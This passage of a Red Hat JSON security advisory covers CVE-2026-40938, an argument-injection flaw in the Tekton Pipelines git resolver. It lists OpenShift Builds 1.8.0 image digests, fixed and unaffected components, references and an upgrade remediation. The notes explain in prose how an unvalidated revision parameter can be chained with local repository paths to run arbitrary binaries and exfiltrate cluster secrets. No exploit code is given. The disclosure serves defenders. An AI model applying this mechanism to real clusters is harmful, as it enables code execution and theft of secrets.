"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-40938",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-04-21T21:02:16.557479+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2460292"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Tekton Pipelines, a system for declaring continuous integration/continuous delivery (CI/CD) pipelines. An authenticated user, able to submit `ResolutionRequest` objects, can exploit a vulnerability by injecting malicious commands into the git resolver\u0027s revision parameter. This allows for the execution of unauthorized programs on the resolver pod. Successful exploitation can lead to the exfiltration of all cluster-wide secrets, resulting in significant information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/tektoncd/pipeline: Tekton Pipelines: Arbitrary code execution and secret exfiltration via malicious git commands",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in Tekton Pipelines allows an authenticated user to achieve arbitrary code execution on the resolver pod by injecting malicious commands into the git resolver\u0027s revision parameter. This vulnerability happens because the `revision` parameter is passed as a positional argument to the `git fetch` command without any previous validation whether the parameter\u0027s value doesn\u0027t start with `-` character. Combining this lack of validation with the fact the function which validates the repository URL explicitly allows a repository URL to being with `/`, translating to a local filesystem. An attacker with enough privileges to perform an operation which trigger resolvers to use the `ResolutionRequest` function can \nchain both behaviors to trick Tekton Pipelines to load and execute an arbitrary binary on the resolver pod.\n\nExploring this vulnerability may be considered of a high complexity as an attacker needs to either know an existing valid git repository located at a predicable path already in the resolver pod or a default URL configuration pointing to a local filesystem\u0027s path.\n \nA successful exploitation of the flaw can lead to the exfiltration of all cluster-wide secrets, posing a significant risk to the integrity and confidentiality of the OpenShift environment. Additionally, depending on the data included in the `kubeconfig` files, an attacker may achieve privilege escalation or perform lateral movements within the targeted cluster.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40938"
},
{
"category": "external",
"summary": "RHBZ#2460292",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460292"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40938",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40938"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1",
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
}
],
"release_date": "2026-04-21T20:45:24.658000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-14T11:39:27+00:00",
"details": "It is recommended that existing users of Red Hat OpenShift Builds 1.7.z upgrade to 1.8.0",
"product_ids": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
